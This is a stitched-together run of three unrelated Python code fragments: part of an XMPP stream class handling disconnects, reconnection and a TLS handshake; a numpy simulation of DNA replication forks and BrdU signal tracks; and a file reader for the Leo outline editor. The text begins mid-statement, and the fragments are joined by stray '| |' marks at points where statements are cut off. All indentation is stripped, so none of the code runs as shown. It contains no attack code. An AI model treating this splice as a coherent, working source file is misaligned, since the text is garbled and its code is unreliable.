last_modified_ns, inum, num_writes = \
rpc.parse_coalesce_object_response(coalesce_response)
unmung_etags(obj_metadata, | |
time.
"""
def _handle_session_timeout():
if not self.session_started_event.is_set():
log.debug("Session start has taken more " + \
"than %d seconds", self.session_timeout)
self.disconnect(reconnect=self.auto_reconnect)
self.schedule("Session timeout check",
self.session_timeout,
_handle_session_timeout)
def disconnect(self, reconnect=False, wait=None, send_close=True):
"""Terminate processing and close the XML streams.
Optionally, the connection may be reconnected and
resume processing afterwards.
If the disconnect should take place after all items
in the send queue have been sent, use ``wait=True``.
.. warning::
If you are constantly adding items to the queue
such that it is never empty, then the disconnect will
not occur and the call will continue to block.
:param reconnect: Flag indicating if the connection
and processing should be restarted.
Defaults to ``False``.
:param wait: Flag indicating if the send queue should
be emptied before disconnecting, overriding
:attr:`disconnect_wait`.
:param send_close: Flag indicating if the stream footer
should be sent before terminating the
connection. Setting this to ``False``
prevents error loops when trying to
disconnect after a socket error.
"""
self.state.transition('connected', 'disconnected',
wait=2.0,
func=self._disconnect,
args=(reconnect, wait, send_close))
def _disconnect(self, reconnect=False, wait=None, send_close=True):
if not reconnect:
self.auto_reconnect = False
if self.end_session_on_disconnect or send_close:
self.event('session_end', direct=True)
# Wait for the send queue to empty.
if wait is not None:
if wait:
self.send_queue.join()
elif self.disconnect_wait:
self.send_queue.join()
# Clearing this event will pause the send loop.
self.session_started_event.clear()
self.__failed_send_stanza = None
# Send the end of stream marker.
if send_close:
self.send_raw(self.stream_footer, now=True)
# Wait for confirmation that the stream was
# closed in the other direction. If we didn't
# send a stream footer we don't need to wait
# since the server won't know to respond.
if send_close:
log.info('Waiting for %s from server', self.stream_footer)
self.stream_end_event.wait(4)
else:
self.stream_end_event.set()
if not self.auto_reconnect:
self.set_stop()
if self._disconnect_wait_for_threads:
self._wait_for_threads()
try:
self.socket.shutdown(Socket.SHUT_RDWR)
self.socket.close()
self.filesocket.close()
except (Socket.error, ssl.SSLError) as serr:
self.event('socket_error', serr, direct=True)
finally:
#clear your application state
self.event('disconnected', direct=True)
return True
def abort(self):
self.session_started_event.clear()
self.set_stop()
if self._disconnect_wait_for_threads:
self._wait_for_threads()
try:
self.socket.shutdown(Socket.SHUT_RDWR)
self.socket.close()
self.filesocket.close()
except Socket.error:
pass
self.state.transition_any(['connected', 'disconnected'], 'disconnected', func=lambda: True)
self.event("killed", direct=True)
def reconnect(self, reattempt=True, wait=False, send_close=True):
"""Reset the stream's state and reconnect to the server."""
log.debug("reconnecting...")
if self.state.ensure('connected'):
self.state.transition('connected', 'disconnected',
wait=2.0,
func=self._disconnect,
args=(True, wait, send_close))
attempts = self.reconnect_max_attempts
log.debug("connecting...")
connected = self.state.transition('disconnected', 'connected',
wait=2.0,
func=self._connect,
args=(reattempt,))
while reattempt and not connected and not self.stop.is_set():
connected = self.state.transition('disconnected', 'connected',
wait=2.0, func=self._connect)
connected = connected or self.state.ensure('connected')
if not connected:
if attempts is not None:
attempts -= 1
if attempts <= 0:
self.event('connection_failed', direct=True)
return False
return connected
def set_socket(self, socket, ignore=False):
"""Set the socket to use for the stream.
The filesocket will be recreated as well.
:param socket: The new socket object to use.
:param bool ignore: If ``True``, don't set the connection
state to ``'connected'``.
"""
self.socket = socket
if socket is not None:
# ElementTree.iterparse requires a file.
# 0 buffer files have to be binary.
# Use the correct fileobject type based on the Python
# version to work around a broken implementation in
# Python 2.x.
if sys.version_info < (3, 0):
self.filesocket = FileSocket(self.socket)
else:
self.filesocket = self.socket.makefile('rb', 0)
if not ignore:
self.state._set_state('connected')
def configure_socket(self):
"""Set timeout and other options for self.socket.
Meant to be overridden.
"""
self.socket.settimeout(None)
def configure_dns(self, resolver, domain=None, port=None):
"""
Configure and set options for a :class:`~dns.resolver.Resolver`
instance, and other DNS related tasks. For example, you
can also check :meth:`~socket.socket.getaddrinfo` to see
if you need to call out to ``libresolv.so.2`` to
run ``res_init()``.
Meant to be overridden.
:param resolver: A :class:`~dns.resolver.Resolver` instance
or ``None`` if ``dnspython`` is not installed.
:param domain: The initial domain under consideration.
:param port: The initial port under consideration.
"""
pass
def start_tls(self):
"""Perform handshakes for TLS.
If the handshake is successful, the XML stream will need
to be restarted.
"""
log.info("Negotiating TLS")
ssl_versions = {3: 'TLS 1.0', 1: 'SSL 3', 2: 'SSL 2/3'}
log.info("Using SSL version: %s", ssl_versions[self.ssl_version])
if self.ca_certs is None:
cert_policy = ssl.CERT_NONE
else:
cert_policy = ssl.CERT_REQUIRED
ssl_args = safedict({
'certfile': self.certfile,
'keyfile': self.keyfile,
'ca_certs': self.ca_certs,
'cert_reqs': cert_policy,
'do_handshake_on_connect': False
})
if sys.version_info >= (2, 7):
ssl_args['ciphers'] = self.ciphers
ssl_socket = ssl.wrap_socket(self.socket, **ssl_args)
if hasattr(self.socket, 'socket'):
# We are using a testing socket, so preserve the top
# layer of wrapping.
self.socket.socket = ssl_socket
else:
self.socket = ssl_socket
try:
self.socket.do_handshake()
except (Socket.error, ssl.SSLError):
log.error('CERT: Invalid certificate trust chain.')
if not self.event_handled('ssl_invalid_chain'):
self.disconnect(self.auto_reconnect, send_close=False)
else:
self._der_cert = self.socket.getpeercert(binary_form=True)
self.event('ssl_invalid_chain', direct=True)
return False
self._der_cert = self.socket.getpeercert(binary_form=True)
pem_cert = ssl.DER_cert_to_PEM_cert(self._der_cert)
log.debug('CERT: %s', pem_cert)
self.event('ssl_cert', pem_cert, direct=True)
try:
cert.verify(self._expected_server_name, self._der_cert)
except cert.CertificateError as err:
if not self.event_handled('ssl_invalid_cert'):
log.error(err)
self.disconnect(self.auto_reconnect, send_close=False)
else:
self.event('ssl_invalid_cert', pem_cert, direct=True)
self.set_socket(self.socket)
return True
def _cert_expiration(self, event):
"""Schedule an event for when the TLS certificate expires."""
if not self.use_tls and not self.use_ssl:
return
if not self._der_cert:
log.warn("TLS or SSL was enabled, but no certificate was found.")
return
def restart():
if not self.event_handled('ssl_expired_cert'):
log.warn("The server certificate has expired. Restarting.")
self.reconnect()
else:
pem_cert = ssl.DER_cert_to_PEM_cert(self._der_cert)
self.event('ssl_expired_cert', pem_cert)
cert_ttl = cert.get_ttl(self._der_cert)
if cert_ttl is None:
return
if cert_ttl.days < 0:
log.warn('CERT: Certificate has expired.')
restart()
try:
total_seconds = cert_ttl.total_seconds()
except AttributeError:
# for Python < 2.7
total_seconds = (cert_ttl.microseconds + (cert_ttl.seconds + cert_ttl.days * 24 * 3600) * 10**6) / 10**6
log.info('CERT: Time until certificate expiration: %s' % cert_ttl)
self.schedule('Certificate Expiration',
total_seconds,
restart)
def _start_keepalive(self, event):
"""Begin sending whitespace periodically to keep the connection alive.
May be disabled by setting::
self.whitespace_keepalive = False
The keepalive interval can be set using::
self.whitespace_keepalive_interval = 300
"""
if self.whitespace_keepalive:
self.schedule('Whitespace Keepalive',
self.whitespace_keepalive_interval,
self.send_raw,
args=(' ',),
kwargs={'now': True},
repeat=True)
def _remove_schedules(self, event):
"""Remove whitespace keepalive and certificate expiration schedules."""
self.scheduler.remove('Whitespace Keepalive')
self.scheduler.remove('Certificate Expiration')
def start_stream_handler(self, xml):
"""Perform any initialization actions, such as handshakes,
once the stream header has been sent.
Meant to be overridden.
"""
pass
def register_stanza(self, stanza_class):
"""Add a stanza object class as a known root stanza.
A root stanza is one that appears as a direct child of the stream's
root element.
Stanzas that appear as substanzas of a root stanza do not need to
be registered here. That is done using register_stanza_plugin() from
sleekxmpp.xmlstream.stanzabase.
Stanzas that are not registered will not be converted into
stanza objects, but may still be processed using handlers and
matchers.
:param stanza_class: The top-level stanza object's class.
"""
self.__root_stanza.append(stanza_class)
def remove_stanza(self, stanza_class):
"""Remove a stanza from being a known root stanza.
A root stanza is one that appears as a direct child of the stream's
root element.
Stanzas that are not registered will not be converted into
stanza objects, but may still be processed using handlers and
matchers.
"""
self.__root_stanza.remove(stanza_class)
def add_filter(self, mode, handler, order=None):
"""Add a filter for incoming or outgoing stanzas.
These filters are applied before incoming stanzas are
passed to any handlers, and before outgoing stanzas
are put in the send queue.
Each filter must accept a single stanza, and return
either a stanza or ``None``. If the filter returns
``None``, then the stanza will be dropped from being
processed for events or from being sent.
:param mode: One of ``'in'`` or ``'out'``.
:param handler: The filter function.
:param int order: The position to insert the filter in
the list of active filters.
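Illustrative example (the handler and stream names here are hypothetical)::
def drop_empty_messages(stanza):
# Returning None drops the stanza from further processing.
if stanza.name == 'message' and not stanza['body']:
return None
return stanza
xmpp.add_filter('out', drop_empty_messages)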
"""
if order:
self.__filters[mode].insert(order, handler)
else:
self.__filters[mode].append(handler)
def del_filter(self, mode, handler):
"""Remove an incoming or outgoing filter."""
self.__filters[mode].remove(handler)
def add_handler(self, mask, pointer, name=None, disposable=False,
threaded=False, filter=False, instream=False):
"""A shortcut method for registering a handler using XML masks.
The use of :meth:`register_handler()` is preferred.
:param mask: An XML snippet matching the structure of the
stanzas that will be passed to this handler.
:param pointer: The handler function itself.
:param name: A unique name for the handler. A name will
be generated if one is not provided.
:param disposable: Indicates if the handler should be discarded
after one use.
:param threaded: **DEPRECATED**.
Remains for backwards compatibility.
:param filter: **DEPRECATED**.
Remains for backwards compatibility.
:param instream: Indicates if the handler should execute during
stream processing and not during normal event
processing.
"""
# To prevent | |
import numpy as np
from collections import namedtuple
from pomegranate import GeneralMixtureModel,NormalDistribution
import pandas as pd
def smooth(ser, sc):
return np.array(pd.Series(ser).rolling(sc, min_periods=1, center=True).mean())
origin = namedtuple("origin",["pos","firing_time","L_fork_speed","R_fork_speed"])
Pause = namedtuple("pause",["pos","duration"])
def track(time,start_time=2,end_time=15,maxv=0.8,minv=0.1,inct=1,pulselen=4,dect=5):
"""
Given a 1D array of times, generate a single fork signal
following an exponentially increasing law between start_time and start_time + pulselen,
followed by a decreasing exponential law.
The ascending part is governed by maxv and inct (the characteristic time of the exponential);
the descending part by minv and dect (the characteristic time of the exponential).
It returns a 1d array with the results, as well as the actual length of the ascending
part (which can be truncated) and the length of the background part before the ascending
exponential.
"""
before = time[time<=start_time]
initial = time[ (time > start_time) & (time < start_time + pulselen)]
if len(initial) != 0:
initial = maxv*(1-np.exp(-(initial-start_time)/inct))
final = time[(time >= start_time + pulselen) & (time < end_time)]
if len(initial) != 0:
startv = initial[-1]
else:
startv = maxv*(1-np.exp(-(pulselen)/inct))
if len(final) != 0:
final = startv + (minv -startv)*(1-np.exp(-(final-start_time-pulselen)/dect))
end = time[time >= end_time]
result = np.concatenate([np.zeros_like(before),initial,final,np.zeros_like(end)])
#print(maxv,np.max(result))
return result,len(initial),len(before)
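# Illustrative use of track() (values chosen arbitrarily):
# time = np.arange(0, 30, 0.5)
# signal, n_up, n_before = track(time, start_time=2, end_time=15)
# 'signal' rises towards maxv during the pulse then decays towards minv;
# 'n_up' is the length of the ascending part and 'n_before' the number of
# samples before the pulse starts.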
def intersection(p1,p2,pause=[0,0]):
"""
Given two converging forks and their firing times and speeds,
compute the position of the intersection
as well as the time of intersection.
If the intersection is outside [x1,x2], the initial positions of the forks,
then return False.
"""
x1,t1,R_fork_speed=p1.pos,p1.firing_time,p1.R_fork_speed
x2,t2,L_fork_speed=p2.pos,p2.firing_time,p2.L_fork_speed
t1 += pause[0]
t2 += pause[1]
assert(x2>x1)
#x = (x1+x2)/2 + (t2-t1)*v/2
x = 1/(1/L_fork_speed+1/R_fork_speed)*(t2-t1 + x1/L_fork_speed+x2/R_fork_speed)
if not( x1<x<x2):
return False,[None,None]
t = (x2-x1)/(R_fork_speed+L_fork_speed) + (t1 * R_fork_speed + t2 * L_fork_speed)/(R_fork_speed+L_fork_speed)
return True,[x,t]
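# Derivation sketch for the expressions above: the right-moving fork from p1
# is at x1 + R_fork_speed*(t - t1) and the left-moving fork from p2 is at
# x2 - L_fork_speed*(t - t2); equating the two gives
# t = ((x2 - x1) + R_fork_speed*t1 + L_fork_speed*t2) / (R_fork_speed + L_fork_speed)
# and substituting t back into either trajectory gives the meeting position x.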
def generate_mrt(pos_time,end=1000,start_at_zero=True):
"""
Given a list of origins with firing times and fork speeds,
return a 1d array with the times at which replication occurs.
By default the lowest time is zero.
To do so it builds a list with positions and times of initiation and termination
and then uses numpy's linear interpolation function.
"""
#print(pos_time)
x1,t1,L_fork_speed = pos_time[0].pos,pos_time[0].firing_time,pos_time[0].L_fork_speed
first = [0,t1+x1/L_fork_speed]
pos_with_terms = [first]
for p1,p2 in zip(pos_time[:-1],pos_time[1:]):
possible,inte = intersection(p1,p2)
pos_with_terms.extend([[p1.pos,p1.firing_time],inte+[]])
if not possible:
return False
if len(pos_time) == 1:
p2 = pos_time[0]
pos_with_terms.append([p2.pos,p2.firing_time])
x2,t2,R_fork_speed=p2.pos,p2.firing_time,p2.R_fork_speed
pos_with_terms.append([end,t2+(end-x2)/R_fork_speed])
p = np.array(pos_with_terms)
#print(p)
mrt = np.interp(np.arange(end),p[:,0],p[:,1])
if start_at_zero:
return mrt-np.min(mrt)
else:
return mrt
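# Illustrative usage (the 'origin' namedtuple is defined at the top of this file):
# oris = [origin(pos=300, firing_time=0, L_fork_speed=1, R_fork_speed=1),
#         origin(pos=700, firing_time=5, L_fork_speed=1, R_fork_speed=1)]
# mrt = generate_mrt(oris, end=1000)  # 1d array of per-position replication times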
def generate_rfd(pos_time,end=1000):
"""
Given a list of origins with firing times and fork speeds,
return the direction of replication (RFD).
"""
#print(pos_time)
rfd = np.zeros(end)
x1,t1,L_fork_speed = pos_time[0].pos,pos_time[0].firing_time,pos_time[0].L_fork_speed
rfd[:x1] = -1
for p1,p2 in zip(pos_time[:-1],pos_time[1:]):
possible,inte = intersection(p1,p2)
middle = int(round(inte[0],0))
rfd[p1.pos:middle]=1
rfd[middle:p2.pos]=-1
if len(pos_time) == 1:
x2,t2=x1,t1
else:
x2,t2=p2.pos,p2.firing_time
rfd[x2:]=1
return rfd
def generate_track(pos_time,start_time=10,end=1000,params={},same_parameters=True,pauses=[]):
"""
Given a list of origins with firing times and fork speeds,
and a start_time for the injection of Brdu, return the corresponding
Brdu incorporation.
"""
param_k = ["maxv","minv","pulselen","inct","dect"]
list_param_generated=[]
def generate_params(param_k,already_done={}):
if already_done != {}:
return already_done
kw={}
for p in param_k:
if type(params[p]) == list:
kw[p] = params[p][0] + (params[p][1]-params[p][0])*np.random.rand()
else:
kw[p] = params[p]
list_param_generated.append(kw)
return kw
kw = {}
if same_parameters:
kw = generate_params(param_k)
if len(pauses) ==0:
pauses=[Pause(pos=None,duration=0)] * (len(pos_time)+1)
# Check that pauses are ordered
if len(pauses)>1:
for p1,p2 in zip(pauses[:-1],pauses[1:]):
if p1.pos != None and p2.pos != None:
assert(p1.pos<p2.pos)
# Insert empty pauses and order them; check there is only one pause between consecutive origins
#print("Before",pauses)
#print(pauses)
if len(pauses) != (len(pos_time)+1):
f_pauses=[None]*(len(pos_time)+1)
p_ori_order=[ori.pos for ori in pos_time]
#print(p_ori_order)
startp=0
if pauses[0].pos<p_ori_order[0]:
f_pauses[0]=pauses[0]
startp=1
for pause in pauses[startp:]:
for ipos in range(len(p_ori_order)-1):
if p_ori_order[ipos+1]>pause.pos>=p_ori_order[ipos]:
if f_pauses[ipos+1] != None:
print("At least two pauses located between two origins")
print("Origins",pos_time)
print("Pauses",pauses)
raise
else:
f_pauses[ipos+1]=pause
if pauses[-1].pos>p_ori_order[-1]:
f_pauses[-1]=pauses[-1]
for i in range(len(f_pauses)):
if f_pauses[i] == None:
f_pauses[i]=Pause(pos=None,duration=0)
#print("After",f_pauses)
pauses=f_pauses
else:
#Pauses must be located between origins
for pause,ori in zip(pauses,pos_time):
if pause.pos != None:
assert(pause.pos<=ori.pos)
for pause,ori in zip(pauses[1:],pos_time[:]):
if pause.pos != None:
assert(pause.pos>=ori.pos)
assert(len(pauses)==len(pos_time)+1)
#def generate_time(start_t,pos_end,speed,pause=0):
# return np.arange(start_t,start_t+pos_end/speed,1/speed)
trac = np.zeros(end)
x1,t1,L_fork_speed = pos_time[0].pos,pos_time[0].firing_time,pos_time[0].L_fork_speed
time= np.arange(t1,t1+x1/L_fork_speed,1/L_fork_speed)
if pauses[0].duration != 0:
#print(pauses)
time[x1-pauses[0].pos:]+=pauses[0].duration
t,len_init,before = track(time,start_time=start_time,end_time=t1+x1/L_fork_speed+pauses[0].duration,
**generate_params(param_k,kw))
trac[:x1] = t[:x1][::-1]
#print(len_init)
mrt = [time[:x1][::-1]]
#mrt[:x1] = time[:x1][::-1]
len_initial = [len_init + 0] #store the length of the increasing parts
pos_s = [[x1-len_init-before,x1-before]]
for interval,(p1,p2,pause) in enumerate(zip(pos_time[:-1],pos_time[1:],pauses[1:]),1):
if pause.duration !=0:
assert(p2.pos>pause.pos>p1.pos)
possible,inte = intersection(p1,p2)
middle = int(round(inte[0]))
first_encounter_pause=True
if pause.duration!=0:
if middle > pause.pos:
#First fork get their first
delta=middle-pause.pos
delta_t=delta/p2.L_fork_speed
if delta_t>pause.duration:
#Then fork1 finish its pause
#Equivalent to starting late of time pause
possible,inte = intersection(p1,p2,pause=[pause.duration,0])
middle = int(round(inte[0]))
else:
pauses[interval] = Pause(pos=pause.pos,duration=delta/p2.L_fork_speed)
pause=pauses[interval]
middle = pause.pos
else:
first_encounter_pause = False
delta=pause.pos-middle
delta_t=delta/p1.L_fork_speed
if delta_t >pause.duration:
#Then fork2 finish its pause
possible,inte = intersection(p1,p2,pause=[0,pause.duration])
middle = int(round(inte[0]))
else:
pauses[interval] = Pause(pos=pause.pos,duration=delta/p1.L_fork_speed)
pause=pauses[interval]
middle = pause.pos
size = len(trac[p1[0]:middle])
starto = p1.firing_time
R_fork_speed = p1.R_fork_speed
time= np.arange(starto,starto+size/R_fork_speed,1/R_fork_speed)
end_cover=0
if pause.duration != 0:
end_cover=pause.duration
if first_encounter_pause and pause.duration !=0:
time[pause.pos-p1.pos:] += pause.duration
mrt.append(time[:size])
#print(time)
#print(time,len(time))
#print(p1[0],p2[0],middle)
#print(track(time,start_time=start_time,end_time=starto+size/v)[:size])
#trac[p1.pos:middle]
t,len_init,before= track(time,start_time=start_time,end_time=starto+size/R_fork_speed+end_cover,
**generate_params(param_k,kw))
trac[p1.pos:middle] = t[:size]
len_initial.append(len_init + 0)
pos_s += [[p1.pos+before,p1.pos+len_init+before]]
size = len(trac[middle:p2.pos])
starto = p2.firing_time
L_fork_speed = p2.L_fork_speed
time= np.arange(starto,starto+size/L_fork_speed,1/L_fork_speed)
if not first_encounter_pause and pause.duration !=0:
time[p2.pos-pause.pos:] += pause.duration
mrt.append(time[:size][::-1])
#print(time,len(time))
#trac[middle:p2.pos]
t,len_init,before = track(time,start_time=start_time,end_time=starto+size/L_fork_speed+end_cover,
**generate_params(param_k,kw))
trac[middle:p2.pos] = t[:size][::-1]
len_initial.append(len_init + 0)
pos_s += [[p2.pos-len_init-before,p2.pos-before]]
if len(pos_time) == 1:
x2,t2 = x1,t1
R_fork_speed = pos_time[0].R_fork_speed
else:
x2,t2=p2.pos,p2.firing_time
R_fork_speed = p2.R_fork_speed
size = len(trac[x2:])
time= np.arange(t2,t2+size/R_fork_speed,1/R_fork_speed)
if pauses[-1].duration != 0:
#print(pauses)
time[pauses[-1].pos-x2:]+=pauses[-1].duration
mrt.append(time[:size])
#mrt[x2:] = time[:size]
t,len_init,before = track(time,start_time=start_time,end_time=t2+size/R_fork_speed+pauses[-1].duration,
**generate_params(param_k,kw))
trac[x2:] = t[:size]
len_initial.append(len_init + 0)
pos_s += [[x2+before,x2+len_init+before]]
if not same_parameters:
kw = list_param_generated
#print(len(trac),len(np.concatenate(mrt)))
#print(pauses,R_fork_speed)
return trac,[len_initial,pos_s],kw,mrt
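# --- Illustrative usage sketch (not executed) ---------------------------------
# A minimal sketch of generate_track, assuming the module-level `origin` and
# `Pause` namedtuples and the `track()` helper defined in this file. The
# parameter values mirror the ranges documented for data/params.json below
# and are illustrative only.
def _demo_generate_track():
    sim = [origin(50, 2, 15, 15), origin(70, 2, 15, 15)]
    params = {"maxv": 0.3,    # plateau when increasing
              "minv": 0.1,    # plateau when decreasing
              "pulselen": 2,  # pulse length in minutes
              "inct": 0.5,    # characteristic time of the increasing exponential
              "dect": 3.0}    # characteristic time of the decreasing exponential
    trac, lengths, kw, mrt = generate_track(sim, start_time=10, end=100, params=params)
    return trac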
def create_possible_origins(n_ori,n_sim,average_fork_speed,chlen,scaling=15):
"""
Generate a list of possible simulations given a number of origins and an average fork speed.
"""
sims =[]
while len(sims) != n_sim:
pos = np.random.randint(0,chlen,n_ori)
times = np.random.randint(0,chlen/n_ori/scaling,n_ori)
times -= min(times)
pos.sort()
if len(set(pos)) != len(pos):
continue
#print(pos)
sim = [origin(p,t,average_fork_speed,average_fork_speed) for p,t in zip(pos,times)]
if type(generate_mrt(sim)) != bool:
sims.append(sim)
return sims
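# --- Illustrative usage sketch (not executed) ---------------------------------
# Example call for create_possible_origins: draw 5 random configurations of
# 3 origins each on a 1000-bin chromosome with an average fork speed of 15.
# All values are illustrative only.
def _demo_create_possible_origins():
    return create_possible_origins(n_ori=3, n_sim=5, average_fork_speed=15, chlen=1000)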
if __name__ == "__main__":
import argparse
import uuid
import json
from scipy import stats
import pandas as pd
import pylab
import ast
np.random.seed(0)
parser = argparse.ArgumentParser()
parser.add_argument('--prefix', type=str,default="mock")
parser.add_argument('--parameter_file', type=str,default='data/params.json')
parser.add_argument('--average_distance_between_ori', type=float, default=50000)
parser.add_argument('--multi',dest="one_fork", action="store_false")
parser.add_argument('--correct_for_height', action="store_true")
parser.add_argument('--ground_truth', action="store_true")
parser.add_argument('--fork_position', action="store_true",
help="record fork positions")
parser.add_argument('--resolution', type=int, default=100,
help="resolution in bp of the simulation")
parser.add_argument('--n_conf_ori', type=int, default=400,
help="Generate set of ori and firing times")
parser.add_argument('--time_per_mrt', type=int, default=400,
help="Generate time of starting pulse per configuration")
parser.add_argument('--read_per_time', type=int, default=1,
help="Correspond to truncated fiber when the option whole_length"
"is set to False")
parser.add_argument('--draw_sample', type=int,default=0)
parser.add_argument('--conf',type=str,default=None,help="configuration of origins to simulate from")
parser.add_argument('--test', action="store_true")
parser.add_argument('--whole_length', action="store_true")
parser.add_argument('--length', type=int,default=None)
args = parser.parse_args()
##############################################
# Generate track parameters
with open(args.parameter_file,"r") as f:
params = json.load(f)
# maxv: lowest and highest value of the plateau when increasing
# minv: [0.12-0.05, 0.15-0.05], lowest and highest value of the plateau when decreasing
# pulselen: [2, 2], smallest and longest value of the pulse length in minutes
# inct: [.25, 1.25], lowest and highest value of the characteristic time of the increasing exponential
# dect: [2., 5], characteristic time of the decreasing exponential
#############################################
#Either create ori at specific position and firing time
average_fork_speed=15 # in 100 bp/min
Sim = [[origin(50,2,average_fork_speed,average_fork_speed),
origin(70,2,average_fork_speed,average_fork_speed)]]
##############################################
#Choose fiber size and distributions
resolution = args.resolution
if not args.one_fork:
chlen=300000 // resolution
whole_length=False
else:
chlen = 50000 // resolution
whole_length=True
if args.test:
chlen=50000 //resolution
whole_length=True
if args.whole_length:
whole_length=True
if args.length != None:
chlen=int(args.length/resolution)
possiblesize = np.arange(5000//resolution,chlen)
distribsize = stats.lognorm(0.5,scale=35000/resolution).pdf(possiblesize)
distribsize /= np.sum(distribsize)
nfork = {}
pos={}
fiber = {}
rfd = {}
mrts = {}
gt = {}
parameters = {}
all_speeds={}
positions = {}
def draw(law):
if law["type"] == "pomegranate":
return GeneralMixtureModel.from_json(law["params"]).sample(1)
if law["type"] == "choices":
return np.random.choice(law["params"])
if law["type"] == "uniform":
return law["params"][0] + (law["params"][1]-law["params"][0])*np.random.rand()
if law["type"] == "normal":
return np.random.normal(loc=law["params"][0] ,scale=law["params"][1])
if law["type"] == "exp":
if "data" not in law:
law["data"] = pd.read_csv(law["params"])["data"]
which = int(np.random.randint(len(law["data"])))
shift=0
if "shift" in law:
shift= law["shift"]
return law["data"][which]+shift
if args.conf != None:
Confs = []
Pauses = []
with open(args.conf,"r") as f:
for line in f.readlines():
new_conf = ast.literal_eval(line)
average_fork_speed = draw(params["speed"]) / resolution
ori_pos =[]
for ori in new_conf[0]:
if len(ori)==4:
ori[0] = int(ori[0]/resolution)
ori_pos.append(origin(*ori))
elif len(ori)==2:
ori[0] /=resolution
ori_pos.append(origin(int(ori[0]),ori[1],average_fork_speed,average_fork_speed))
else:
raise ValueError("Origin specification must have 2 or 4 fields")
Confs.append(ori_pos)
if len(new_conf)==2:
| |
values are vnodes.
self.path = None
self.root = None
self.VNode = TestVNode if test else leoNodes.VNode
self.test = test
#@+others
#@+node:ekr.20180602103135.3: *3* fast_at.get_patterns
#@@nobeautify
def get_patterns(self, delims):
'''Create regex patterns for the given comment delims.'''
# This must be a function, because of @comments & @delims.
delim_start, delim_end = delims
delims = re.escape(delim_start), re.escape(delim_end or '')
delim_start, delim_end = delims
patterns = (
# The list of patterns, in alphabetical order.
# These patterns must be mutually exclusive.
r'^\s*%s@afterref%s$'%delims, # @afterref
r'^(\s*)%s@(\+|-)all\b(.*)%s$'%delims, # @all
r'^\s*%s@@c(ode)?%s$'%delims, # @c and @code
r'^\s*%s@comment(.*)%s'%delims, # @comment
r'^\s*%s@delims(.*)%s'%delims, # @delims
r'^\s*%s@\+(at|doc)?(\s.*?)?%s\n'%delims, # @doc or @
r'^\s*%s@end_raw\s*%s'%delims, # @end_raw
r'^\s*%s@@first%s$'%delims, # @first
r'^\s*%s@@last%s$'%delims, # @last
r'^(\s*)%s@\+node:([^:]+): \*(\d+)?(\*?) (.*)%s$'%delims, # @node
r'^(\s*)%s@(\+|-)others\b(.*)%s$'%delims, # @others
r'^\s*%s@raw(.*)%s'%delims, # @raw
r'^(\s*)%s@(\+|-)%s\s*%s$'%( # section ref
delim_start, g.angleBrackets('(.*)'), delim_end)
)
# Return the compiled patterns, in alphabetical order.
return (re.compile(pattern) for pattern in patterns)
#@+node:ekr.20180603060721.1: *3* fast_at.post_pass
def post_pass(self, gnx2body, gnx2vnode, root_v):
'''Set all body text.'''
# Set the body text.
if self.test:
# Check the keys.
bkeys = sorted(gnx2body.keys())
vkeys = sorted(gnx2vnode.keys())
if bkeys != vkeys:
g.trace('KEYS MISMATCH')
g.printObj(bkeys)
g.printObj(vkeys)
if self.test:
sys.exit(1)
# Set the body text.
for key in vkeys:
v = gnx2vnode.get(key)
body = gnx2body.get(key)
v._bodyString = ''.join(body)
else:
assert root_v.gnx in gnx2vnode, root_v
assert root_v.gnx in gnx2body, root_v
# Don't use items(): it doesn't exist in Python 2.
for key in gnx2body:
body = gnx2body.get(key)
v = gnx2vnode.get(key)
assert v, (key, v)
v._bodyString = g.toUnicode(''.join(body))
#@+node:ekr.20180602103135.2: *3* fast_at.scan_header
header_pattern = re.compile(r'''
^(.+)@\+leo
(-ver=(\d+))?
(-thin)?
(-encoding=(.*)(\.))?
(.*)$''', re.VERBOSE)
def scan_header(self, lines):
'''
Scan for the header line, which follows any @first lines.
Return (delims, first_lines, i+1) or None
'''
first_lines = []
i = 0 # To keep some versions of pylint happy.
for i, line in enumerate(lines):
m = self.header_pattern.match(line)
if m:
delims = m.group(1), m.group(8) or ''
return delims, first_lines, i+1
first_lines.append(line)
return None
#@+node:ekr.20180602103135.8: *3* fast_at.scan_lines
def scan_lines(self, delims, first_lines, lines, start, test=False):
'''Scan all lines of the file, creating vnodes.'''
#@+<< init scan_lines >>
#@+node:ekr.20180602103135.9: *4* << init scan_lines >>
#
# Simple vars...
afterref = False
# A special verbatim line follows @afterref.
clone_v = None
# The root of the clone tree.
# When not None, we are scanning a clone and all its descendants.
delim_start, delim_end = delims
# The start/end delims.
doc_skip = (delim_start + '\n', delim_end + '\n')
# To handle doc parts.
first_i = 0
# Index into first array.
in_doc = False
# True: in @doc parts.
in_raw = False
# True: @raw seen.
is_cweb = delim_start == '@q@' and delim_end == '@>'
# True: cweb hack in effect.
indent = 0
# The current indentation.
level_stack = []
# Entries are (vnode, in_clone_tree)
n_last_lines = 0
# The number of @@last directives seen.
root_seen = False
# False: The next +@node sentinel denotes the root, regardless of gnx.
# Needed to handle #1065 so reads will not create spurious child nodes.
sentinel = delim_start + '@'
# Faster than a regex!
stack = []
# Entries are (gnx, indent, body)
# Updated when at+others, at+<section>, or at+all is seen.
verbline = delim_start + '@verbatim' + delim_end + '\n'
# The spelling of at-verbatim sentinel
verbatim = False
# True: the next line must be added without change.
#
# Init the data for the root node.
#
#
# Init the parent vnode for testing.
#
if self.test:
root_gnx = gnx = 'root-gnx'
# The node that we are reading.
# start with the gnx for the @file node.
gnx_head = '<hidden top vnode>'
# The headline of the root node.
context = None
parent_v = self.VNode(context=context, gnx=gnx)
parent_v._headString = gnx_head
# Corresponds to the @files node itself.
else:
# Production.
root_gnx = gnx = self.root.gnx
context = self.c
parent_v = self.root.v
root_v = parent_v
# Does not change.
level_stack.append((root_v, False),)
#
# Init the gnx dict last.
#
gnx2vnode = self.gnx2vnode
# Keys are gnx's, values are vnodes.
gnx2body = {}
# Keys are gnxs, values are list of body lines.
gnx2vnode[gnx] = parent_v
# Add gnx to the keys
gnx2body[gnx] = body = first_lines
# Add gnx to the keys.
# Body is the list of lines presently being accumulated.
#
# get the patterns.
after_pat, all_pat, code_pat, comment_pat, delims_pat,\
doc_pat, end_raw_pat, first_pat, last_pat, \
node_start_pat, others_pat, raw_pat, ref_pat = self.get_patterns(delims)
#@-<< init scan_lines >>
#@+<< define dump_v >>
#@+node:ekr.20180613061743.1: *4* << define dump_v >>
def dump_v():
'''Dump the level stack and v.'''
print('----- LEVEL', level, v.h)
print(' PARENT', parent_v.h)
print('[')
for i, data in enumerate(level_stack):
v2, in_tree = data
print('%2s %5s %s' % (i+1, in_tree, v2.h))
print(']')
print('PARENT.CHILDREN...')
g.printObj([v3.h for v3 in parent_v.children])
print('PARENTS...')
